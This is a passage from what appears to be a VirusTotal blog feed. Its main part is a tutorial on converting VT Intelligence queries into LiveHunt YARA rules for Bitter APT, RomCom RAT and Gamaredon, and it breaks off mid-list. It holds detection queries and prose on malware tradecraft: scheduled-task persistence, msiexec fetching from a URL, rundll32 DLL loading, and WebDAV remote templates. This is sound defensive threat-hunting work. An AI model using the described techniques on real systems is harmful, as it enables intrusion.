collaboration. We're contemplating the
release of a framework that empowers our
community and third-party providers to
create and contribute their own connectors,
embodying our commitment to crowdsourced
security.</span>
</p>
<div>
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-f2caa2a7-7fff-9943-4a14-8168c0313c80"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">If you are a customer looking to
connect one of your threat intelligence
sources or an industry player seeking
support for your solution, </span><a href="https://www.virustotal.com/gui/contact-us/suggestions" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">please do not hesitate to contact
us</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">.
</span></span></span>
</div>
</span></span></span></span></span></span></span></span>
</span></span>
</div>
<div style="font-size: 11pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></span></span></span></span>
</div>
<div style="font-size: 11pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Happy Hunting!</span></span></span></span></span>
</div>
</span>
</div>
</span>
</div>
</span>
Daniel Pascualhttp://www.blogger.com/profile/08323806282777764706noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-16980101721135398902023-10-17T10:48:00.002+02:002023-10-17T11:15:33.244+02:00The path from VT Intelligence queries to VT Livehunt rules: A CTI analyst approach<div class="interval_12">This post will explain the process you can follow to create a VT Livehunt rule from a VT Intelligence query. Something typical in threat hunting and threat intelligence operations.</div>
<div class="interval_12"> Let’s assume that, as a threat hunter, you created robust VT intelligence (VTI) queries getting you reliable results without false positives. Your queries are so good that you run them daily to obtain fresh new samples, which is a tedious job to do manually (pro tip - you can automate using the API).
</div>
<div class="interval_12"> A good alternative would be converting your VTI query into a LiveHunt rule, so you will be immediately notified every time any uploaded indicator matches your criteria. Unfortunately, there is not an automated way to convert intelligence queries into LiveHunt rules (and vice versa), and in some cases it is not even possible to obtain exactly the same results (technical tldr - due to limitations of the stored data <a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">structure</a>).
</div>
<div class="interval_12"> But do not despair. In this post we are going to show many practical cases showing LiveHunt rules based on VT intelligence queries, how you can do it yourself, and pros, cons and limitations for this approach.
</div>
<h2 style="text-align: left;">The perfect query ̶d̶o̶e̶s̶n̶’̶t̶ exist </h2>
<div class="interval_12"> <b>Bitter APT</b> </div>
<div class="interval_12"> <a href="https://www.virustotal.com/gui/threat-actor/1e9bd6fe-e009-41ce-8e92-ad78c73ee772" target="_blank">Bitter APT</a> is a <a href="https://attack.mitre.org/groups/G1002/" target="_blank">suspected South Asian cyber espionage</a> threat group. Security researchers like <a href="https://twitter.com/StopMalvertisin" target="_blank">StopMalvertisin</a>, among others, regularly publish information about this actor in both <a href="https://twitter.com/StopMalvertisin/status/1685214676643422208" target="_blank">X</a> and <a href="https://www.virustotal.com/gui/file/1ea9e9ecd0e5b0ac4aedc1b5515484a372dd8aefb1dbeb00f243a0a3ce40fab9/community" target="_blank">VirusTotal community</a>. </div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/VGBxRvyVHNe2E_xA3UOuxjVw3BHWgQkT-InkJJ3lW7AdWDf7zRpBKXEJbeA-z90U01Uw72cpPjSHkEsqUKixfAPKpqHEl7Ug2PiVDFHaENCAhoz3zdqHXInETdpQb4NqB9q9GJbXpU5IqiIoU6pYV7W930EnDSUzFxzNcANbDg26so3rbKk6zIzYJrPtTVM
" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /><figcaption><small><a href="https://www.virustotal.com/gui/file/1ea9e9ecd0e5b0ac4aedc1b5515484a372dd8aefb1dbeb00f243a0a3ce40fab9/community" target="_blank">https://www.virustotal.com/gui/file/1ea9e9ecd0e5b0ac4aedc1b5515484a372dd8aefb1dbeb00f243a0a3ce40fab9/community</a></small>
</figcaption></div></span></div>
<div class="interval_12"> To start hunting for files related to Bitter APT, you probably want to subscribe to any attributed VirusTotal collection or the threat actor profile itself.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/rXWKhvIBoCdH5_-L_MsEyLSP2G4gFssDL2mVP-g3tr2MstaQrQIJ-xk6Zn5OjuCxkmk3KIXDP2zTYDtlir6M4I9bI0DUOieemwGyLXggG9cyywde5_qoUtNvCJ88kExX_9SQ1RZLdaN-UNQ6evTGE70f7JgLH0OOosFqdFMzoUr_5sbkdATCFkURk0PT3LU
" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /><figcaption><small><a href="https://www.virustotal.com/gui/threat-actor/1e9bd6fe-e009-41ce-8e92-ad78c73ee772/summary" target="_blank">https://www.virustotal.com/gui/threat-actor/1e9bd6fe-e009-41ce-8e92-ad78c73ee772/summary</a></small>
</figcaption></div></span></div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/EEI-fSDUkMivxfRbrnfyDK9dp3cZVRxsfaZ2vTs6OEWbkv6QQcbKTRo69-BwXy0bg0r8jhQok_hQgW07CHIltbLS0N245DICvVqggB2XXdJXy6lTbmzfAxY_4y_4ibESIAlBsPQoGkNAYVrP2u3b_ZyjLYE9PzbvImiY3h4tQ-oLjxeiQIg1BjwcMV7oc_E
" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /><figcaption><small><a href="https://www.virustotal.com/gui/collection/alienvault_627ce58306cce7d0a5ae037a
"target="_blank">https://www.virustotal.com/gui/collection/alienvault_627ce58306cce7d0a5ae037a</a></small>
</figcaption></div></span></div>
<div class="interval_12"> You can also search for what the community is discussing about this APT directly by searching on community comments. For example, the next query returns samples related to Bitter APT.
</div>
<div class="my-yara-code interval_12">
<mark class="red">entity:</mark>file <mark class="red">comment:</mark>"Bitter APT"
</div>
<br />
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/m_wq4BM0pDRWrlNdLv9gEptjGdSJwgrF9cKTI_-SShLiGIJJtU5slNi4S5XEBodF9AJlfjAEtUk_Skus9ShZiKkzSDGBsVG9NmoV5-bqkBRrUJ83NRD458PtoKTd9sI5EHJyeLMJRocrtwhfddadPOcrIMsf3vCCDxnVVZLDEW_TfL-w7IgkJRrEil4Ugj8" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> When checking these samples’ behavior we can find interesting patterns that can be used to hunt for other similar ones. For instance, Bitter seems to specially like the "chm" file format, as seen in the initial Twitter/X reference and when calculating Commonalities among these files, along with the use of scheduled tasks to achieve persistence on targeted systems, and run the %comspec% environment variable through the scheduled task created to execute msiexec.exe followed by an URL.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/M62zF1Vs8_ptjKNOGTtyiL6Va5V9P-Eob1DSW-HOQJuGeU6HV8o5MkipQdmd7Dqj4TYcT0rm6NSkteCqs8XtkV8lHHdptMugKJOedl2tcVDtXOElmMLwADhnMWKm32Gac_A2iU-s3V9vJD-OzM3IJPoB2abx3pWTtiPO3q6uHv5G2DYtjJxhTN4zRC9U3gM" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> All these behavioral characteristics will help us create good LiveHunt rules and queries to detect additional samples. For example: </div>
<div class="my-yara-code interval_12">
<mark class="red">behavior_processes:</mark>"%Comspec%" <mark class="red">behavior_processes:</mark>"schtasks.exe" <mark class="red">tag:</mark>chm
</div>
<div class="interval_12"> The query returns 39 different samples, most of them apparently related to Bitter based on behavior similarities.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/cKPDGPBWj1O_4m4H5KU_V51PVKOsdi2_qBB61bJa1Hc3-kRULZBUXq9SXaOoOoYkZowWqI9yxpsODBthu0pZGZYJ3fGlxh3-_rF4S6pWD2Hob2-mkjnZewKoDhTjzuNEYaUd_FSHgIpkS4h9rGbHluV0Sx3jIt_v82mcY6oJMMwiT1Pdpxs33DiIaq-udso" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> Now it's time to translate our query into a LiveHunt rule. Certain functionalities available for VTI queries are not ready (yet) in VT LiveHunt and vice versa. We are working to maximize the integration between both systems, and we will get back with more details as we progress in this.
</div>
<div class="interval_12"> As we published, <a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">we can create a LiveHunt rule from a sample by simply clicking</a> - we are going to create a rule based on 7829b84b5e415ff682f3ef06b9a80f64be5ef6d1d2508597f9e0998b91114499.
</div>
<div class="interval_12"> First, we are interested in identifying the use of the process “schtasks.exe” during sample detonation. In the behaviour details of this sample, we can find “schtasks.exe” in the “Process Tree” and “Shell Commands” sections.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/M92XaRkOAiet-pb75lNFooPes07RnXo-Q6u_5wfV3qaWaAXwXU6yfvbeDzfk6CsWLaQ4DeYc4L6GxrLu_MOGt4Oc4OMRxcdV5FeP-cdH9nLqFZUZ4VFjoVtDcRQOzCW_DjB2ggB07I_8I2AQC8uv4xN9goQkiYYkqLigDg6kVx66zSyChohSMiaEnGlNtQI" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> At the moment, it is not possible to use "Process Tree" in LiveHunt rules, however we can search for processes in "Shell Commands" and "Processes Created" sections to start creating the logic of our rule. In future updates, we will integrate more fields to be used in the creation of LiveHunt YARA rules.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/a_UEKs9DtErUtoS1TMxI0VzqC8LzjgmwLw5cJ569yNLnhj-I4LTpmiAaswSTFHS5Jt9Z_jBQn4v3xLA_JfGM_01SdKW8Nm0FyTtoXgkx7LC4NP4FBbMAg9NS_FxeMHTjzBLofUZlO2E7scqRUJbNllKNM76cNP5DgG4iEjga29mYrl3tFPe8d7t4vZErd4w" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> There is no "Processes Created" section, maybe sandboxes were unable to extract such information. But this does not mean it will be the same for future uploaded samples. We will add both the "Shell Commands" and "Processes Created" fields to the condition.
</div>
<div class="interval_12"> We will follow the same steps to detect the use of the environment variable “%comspec%” in the command line during detonation.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/NctSJiXm9VggIcAipIOwZHzeXQljRo5yYAyqJS-T6esIidFUuHEWM8tugKlJE14dSkauZu2-kAQ2wVUd-_0rapqtYrQrIAQOG4tAoo_cnxiQ1hFNtWKS2kY-FTkYXKM1YX5dlzkI0PftZ4K4PNyBHSFGTei17vcKpJPoJyt9oGZEVVfxQJ25EEvBPzeWoEc" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">We look for the same information in the two sections (shell and processes) and in two different ways as Bitter used upper and lower case letters to spell %coMSPec%. We can simplify this with the "<b>icontains</b>" condition to enforce case insensitiveness.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/_P1Y-YULr9bLIHMEo4swRxB41d7FT_EissX0RUic3qaKp2EHz4y7SRW03lNFn7M-Xmv4kpaseYQil0BmCywS1c8cAojSXaNf632js-QOa3Ruz96c0quyW3Ap4Riy4Z_tDGtHTQaT2aq4zDbM2tSVr9WdT1da9hlwU-NfnbEOqkkVKGvl30tSV2Zdpi_BELw" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> Finally, we want to add two extra conditions. The first is that samples have the "chm" tag since it is the format we look for. The second is to get notifications exclusively for new uploaded files.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/xnqLYCYC3n430YGUeCbJR5kzpuF_icI-JaFOhNUVDJgFz9kVBZEe4edYafh34SiRqTI0GFxgPWQ78kGyWd-rKrCQCcyE5ZTQSlQwnKL8w0AOZiv9UNBSk7-wvCWticihEkHH1TbNEadRSqIeQcwGrJvemMuufIsgWK1kBj0kmFjXa4CFkNkwqILZWT4NZz8" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">And that’s it! You can download and use this YARA rule <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/APT_Bitter_chm_files.yar" target="_blank">from our public GitHub</a>, to be integrated into our Crowdsourced YARA Hub in the future.
</div>
<div class="interval_12"> <b>RomCom RAT</b> </div>
<div class="interval_12">BlackBerry Threat Research and Intelligence team <a href="https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine" target="_blank">published</a> about Targeting Politicians in Ukraine using the RomCom RAT. During the campaign, threat actors used a trojanized version of <a href="https://devolutions.net/" target="_blank">Remote Desktop Manager</a>.
</div>
<div class="interval_12"> Taking a look at the behavior of the samples provided in this publication, we can find interesting behavioral indicators to generate a VTI query.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/we5_73gr29xkc39_N97jMqyhGg9xQ-LD9EVMqm9CxEsKosrKgWmU9CKe_rpsI3CuRPA2selIsjyDhg3faRgtoMRSqkOr66HbZ7sFjYdYy0gudtcRmjrJW0p009X4WSYlcxRb_07wO1aXbQTD841JyZafr4-_GohVhR0w9igAj1UCPQxK0YaWhcfdwTzTitg" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> Different samples related to RomCom RAT seem to usually drop DLL files in the path “C:\Users\Public\Libraries” with different extensions, and execute them using “rundll32.exe”. That means there are also file creation events in the same path.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/WnS5hrMuLYbWxv7QqsJLJux2QS9ewWa0QlkhR5WzQlp6rwttOFKKPkJecM-iXxZ9mti0HzztgUUxKrdTTSHcNVZHU21W2h5EtJNebMedU21KU-63o_pu5_8AF_zZgKeRjLp42ZskiBsZbIp7kOC2lgILspjfaMwCazwPD_o2EEpH5kHQs2aDuzlIMtxazuI" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> All of these indicators, along with others used by RomCom RAT in different intrusions, can be used to create a potential query that can later be translated into a LiveHunt.
</div>
<div class="interval_12">These samples export up to three different functions:
</div>
<div class="interval_12">
<ul>
<li>fwdTst</li>
<li>#1</li>
<li>Main</li>
</ul>
</div>
<div class="interval_12">“Main” is probably the most common function exported by many other legitimate DLLs, so we will ignore it. The VTI query we use is as follows:
</div>
<div class="my-yara-code interval_12">
((<mark class="red">behavior_processes:</mark>".dll,fwdTst") OR (<mark class="red">behavior_processes:</mark>"dll\",#1" <mark class="red">behavior_processes:</mark>"\\Public\\Libraries\\") OR (<mark class="red">behavior_processes:</mark>*.dll0* <mark class="red">behavior_processes:</mark>"\\Public\\Libraries\\")) AND ((<mark class="red">behaviour_files:</mark>*\\Public\\Libraries\\*) AND (<mark class="red">behavior:</mark>*rundll32.exe*))
</div>
<div class="interval_12"> Even if you don't know that the "Main" function is common in the use of DLLs, when building our query we would observe a large number of samples matching our logic. For this reason, it is important that before creating a rule we use a query when possible to understand if results align with our expectations, and iterate the condition until we are satisfied with it.
</div>
<div class="interval_12"> The last query provides samples related both to RomCom RAT and Mustang Panda. This might indicate that both threat actors are using similar procedures during their campaigns.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/DeyxF0jA7zPEie3j6FpuSnLgxahkITfPRvMRz5Q554idYOR9hxwUgkG4MJ0tdsdveI4AcBJ-1OOC8o815JcYSi9BeQkzinw96JlgwNhNniaI5iWK0-i8QotfH2u7IA1ibavr1p9taYwnbWcgVAlOduyyKCmW7cxHekn77RmWj77hcT_VX_DTj9T1217CQvM" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> To convert this query to LiveHunt, we will split the original query into different sections and adapt them to the rule. As previously explained, the rule will be slightly different from the original query for compatibility reasons.
</div>
<div class="interval_12">
<ol>
<li>First, we only want DLLs, EXE or MSI files.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/sctuSgay4Vr3Q2N3V9Wnvo6IjKl6YuohwfX0Nux0xbrCmJFRp8N9k50Mo8AJ5QLdd7YPm-BuGp3uq8DJe2Az1FqjJUmGD5aZqJRjGPjyQ4H248dAvGKfkY4Iq2D8KwqABY4bHyUjpgnwp7icd6XKy1v67I7C2CAp7hCXfJh_xJ9MMtmLa_nzIlCf2QuS5Wk" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>As a precaution to minimize false positives, we want to skip samples that are not detected as malicious by AntiVirus vendors.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/WzUPHv3i-xWsccYds632RMLbFALAe_j6ObS-aEN9OL6vd7SneiwS4PO-oE2t7YrN2wrOBRuDNGD5bQJd_1RYpxahjxBMB0dsuW3kma1hW0O5a8V_9KFF01ubWnL40RHii7mdebEyiE0juDbw5DsSsp5zV44GEPKYfjZsOyzkprARQIDuq_F49RO93bnS40k" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>Something that we can’t do in VT intelligence queries is determine behavioral activity related to file write actions. VTI behavior_files modifier performs a generic search for any literal within file activity, including creation, modification, writing, deletion… LiveHunt gives us more precision to specify our search only for written files during detonation.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/oO4zcB4x_2hNKYpuCEaBCyaMDKpGa5pKIm-1KCUrN-_jS0htanfhdIsMNTFoPykxreJkM4Uf_JQHNj9--Vy7LDfq7GiwwBxy4OSVEi3poYBCe5QKxMj5QQbx4Hr1cOVhIz99ZYUgYaRyjyu0dKtbulqb6czxFOQYOI2OOIMF-GR7olRjNAYTCvkeagzYGug" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>Rundll32.exe is used during execution since this DLL should be executed along this sample's process. We will search for it in different fields.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/A_DnpvkSgnTecLh0N13l4qtFANQI8YQtNRVBfNcNJGT91i8Y-NZes5VgmIIhkHM4CMF2zKFX5lVifb6Es9StnzNmYBS-dnPypKtJxKHUxw-570JLt64Bv-tt8PNUkzZZrgBP84maehxs-SdcYD2kcwL7kEAHlBdmKJ7d8r5UmMyLRDXMwck-9890INxUg2Q" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>Finally, we are interested in obtaining the functions exported by the observed DLLs, which are written in the command lines. We are also interested in the existence of a .DLL extension, which will indicate that there is some type of activity involving libraries.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/bLo40XaWzwUOyju0nBabMDETwgvp_FwON8JGJMsLaPqPeBit1aQN0fTrKmO5mchvMXQpFN7f6R8TAcywzrR0jRLp9EO5z-jvOop2pamDZNh5wvHWkojhJzVQUYr5hfRPayg6kHx9BkJOfy0TK106nPLK-8e2qYP6VjqD7TNz2w02ZdrV0L7Z489njdAflT4" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
</ol>
</div>
<div class="interval_12">You can also find this rule in <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/RomCom_MustangPanda_Similar_Behaviors.yar" target="_blank">our public Github</a> repository. Feel free to modify it based on your needs!</div>
<div class="interval_12"> <b>Gamaredon</b> </div>
<div class="interval_12">Our last example is related to the Gamaredon threat actor. As per <a href="https://attack.mitre.org/groups/G0047/" target="_blank">MITRE</a> “Gamaredon Group is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine”.
</div>
<div class="interval_12"> The use of the <a href="https://attack.mitre.org/techniques/T1221/" target="_blank">remote template</a> injection technique is common by this threat actor. This feature involves making connections to a remote resource to load a malicious template. The external domains used to host it generally use some URL pattern. According to <a href="https://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/" target="_blank">publications</a> from different vendors, this actor usually registers domains in the “.ru” TLD.
</div>
<div class="interval_12"> Gamaredon also uses the DLL “davclnt.dll” with the “DavSetCookie” function. This behavior is related to flags that may be connected to exfiltration or use of WebDav to launch code. In other words, this is used to load the remote template. We can quickly check this with the following query:
</div>
<div class="my-yara-code interval_12">
<mark class="red">threat_actor:</mark>"Gamaredon Group" <mark class="red">behavior:</mark>"DavSetCookie"
</div>
<div class="interval_12">Putting all this information together, we can create the next VT intelligence query to get samples related to Gamaredon:
</div>
<div class="my-yara-code interval_12">
(<mark class="red">behavior_processes:</mark>*.ru* and <mark class="red">behavior_processes:</mark>*DavSetCookie* and <mark class="red">behavior_processes:</mark>*http*) and (<mark class="red">behavior_network:</mark>*.ru* or <mark class="red">embedded_domain:</mark>*.ru* or <mark class="red">embedded_url:</mark>*.ru*) (<mark class="red">type:</mark>document)
</div>
<div class="interval_12"> The query is designed to discover file-type documents where the following strings are found during execution:
</div>
<div class="interval_12"><u>Behavior_processes:</u> </div>
<div class="interval_12">
<ul>
<li>First we want to identify the use of the string “.ru” in the command line. This will be related to domains with this TLD.
</li>
<li>Another string that we want to match in the command line is “DavSetCookie”, since it was used by Gamaredon to accomplish remote template loading.
</li>
<li>Finally the string “http” must be in the command line as well.
</li>
</ul>
</div>
<div class="interval_12"><u>Behavior_network:</u> </div>
<div class="interval_12">
<ul>
<li>See if there are communications <b>established</b> with domains having the “.ru” TLD.
</li>
</ul>
</div>
<div class="interval_12"><u>Embedded_domain:</u> </div>
<div class="interval_12">
<ul>
<li>Domains embedded within the document containing the TLD “.ru”. <b>It is not necessary that a connection has existed</b>. We do it this way in case our sandboxes have had problems communicating or the sample has simply decided not to communicate.
</li>
</ul>
</div>
<div class="interval_12"> <u>Embedded_url:</u> </div>
<div class="interval_12">
<ul>
<li>URLs embedded within the document containing the TLD “.ru”. <b>It is not necessary that a connection has existed</b>. We do it this way in case our sandboxes have had problems communicating or the sample has simply decided not to communicate
</li>
</ul>
</div>
<div class="interval_12"><div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/BDBa-WEi1yjbov31H-twWFtDKzRyy8hW3vtUJd01Zo3diDYWJDAEGkrCguEHt4d7dmJ-x3QEO_QtRM_175ZI2B5QdaPDxHCfWNwTTC2yDuEJqcq3-KUpb4iAQDJouaVGMsdEXF3GK_XkpZBWmL8xY0EubHr-2HBXtxoiiknenECIiqnbYn5BQ_a9lkvnNN4" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div> </div>
<div class="interval_12"> This VT intelligence query provides results that seem to be consistent with known Gamaredon samples, based on the previously discussed patterns. It is always possible we get false positives among the results.
</div>
<div class="interval_12"> Let's convert this VT intelligence query to a LiveHunt to receive notifications for new interesting files.
</div>
<div class="interval_12">
<ol>
<li>First, we want to make sure the exported DLL function is found for any command line or process-related behavior, as well as finding traces of the “.ru” TLD is found for http communication. It is important to mention that we look for information about the TLD ".ru" and the string "http" in the command lines because it could be the case that the connection is not established, but there was an intention to establish it.
</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/jtGak9FnAyJi2WyuGF-kd0TsA9ARcaA4OhnxFrUnChV1_7V1j9nFmhHzPgFxM-lMQ8FKA6LkfB93rbHcfvfN4O_qN4vcfpeTVQryfuoN_sShAPc8s-mqutTjc_7gBGAzvqbZp1Z4fq_vsIWl6i4guOLSvw8rYMopRgQvdujveZdIDvfpNmrawXWFLOLQQ60" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>Communications are important, for that reason we need to check if there were connections established with domains having the TLD .ru. Remember the next block will match only if communications existed
</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/l0K2ZjSk3gJsf0kjsf4VSTfh3vWMxUfmIP2ORoX-sl_LlwtP9QPgKDFqYSVxmKEqw2WTW4RVdSYJn5eisoRAcX5OfjTDYI4sGK97zUz90uve0DysE9UTY5EgI9UFs3wzRVkFWFdd8TfTRcLiIeh6xcvQ5BRcOeDRmRN1kDeMfl3GXymz-9ePDkfHxF2xIHM" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>And for this example, we are just interested in document files, although you can change it to any other file type to adapt it to your needs.
</li>
